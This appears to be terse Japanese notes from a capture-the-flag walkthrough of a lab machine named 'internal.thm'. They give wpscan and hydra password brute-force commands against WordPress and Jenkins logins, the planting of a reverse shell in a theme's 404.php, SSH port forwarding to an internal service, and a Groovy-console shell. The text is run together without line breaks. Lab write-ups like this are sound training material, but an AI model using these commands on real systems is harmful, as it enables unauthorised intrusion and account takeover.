wpscan --url <http://internal.thm/blog> -eadmin が見つかるwpscan --url <http://internal.thm/blog> -U admin -P /usr/share/wordlists/rockyou.txtAppearance から 404.php を編集してリバースシェルを入れる(WordPress: Reverse Shell)http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php にアクセス/opt にパスワードがあるらしい(は?)su aubreanna で権限昇格aubreanna@internal:~$ cat jenkins.txt cat jenkins.txt Internal Jenkins service is running on 172.17.0.2:8080
ssh -L 1234:172.17.0.2:8080 [email protected]http://127.0.0.1:8080 で jenkins にアクセスできるhydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txtncAbusing Jenkins Groovy Script Console to get Shell